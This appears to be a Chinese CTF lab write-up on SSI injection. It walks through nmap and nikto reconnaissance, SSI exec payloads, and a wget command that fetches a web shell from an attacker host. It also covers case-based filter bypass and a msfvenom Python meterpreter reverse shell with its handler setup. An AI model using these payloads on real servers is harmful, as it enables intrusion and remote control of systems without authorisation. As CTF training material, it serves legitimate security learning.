CTF实验:SSI注入

SSI注入攻击介绍

SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。  
  如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb HTTP://IP:端口
只开了http服务
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
找到敏感页面,打开
将文件下载下来
在这里插入图片描述
可以查看文件的内容

在这里插入图片描述

在这里插入图片描述
可能是提示记下来
在这里插入图片描述

漏洞利用

根据提示来利用对应SSL注入漏洞
列举当前目录中的文件和目录
《!–#exec cmd=“ls” -->
切换到指定目录
《!–#exec cmd=“cd /root/dir/”>
下载shell脚本 并重命名为shell.php
《!–#exec cmd=“wget http://ip/shell.txt | rename shell.txt shell.php” -->

尝试输入一些命令
在这里插入图片描述
返回结果
可以看到Target里<被注释了,Feedback里exec被注释了,将其改为大写再试试,成功了在这里插入图片描述

制作webshell

msfvenom -p python/meterpreter/reverse_tcp lhoost=ip lport=4444 -f raw > shell.py

启动msfconsole在这里插入图片描述
设置参数
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在这里插入图片描述

上传shell反弹shell

要shell.py 放在var/www/html 里 并开启apache2服务
在这里插入图片描述
准被上传
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功进入
sysinfo 查看系统信息
shell 进入系统shell
优化终端 python –c ‘import pty;pty.spawn(“/bin/bash”)’
在这里插入图片描述
在这里插入图片描述

总结

在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值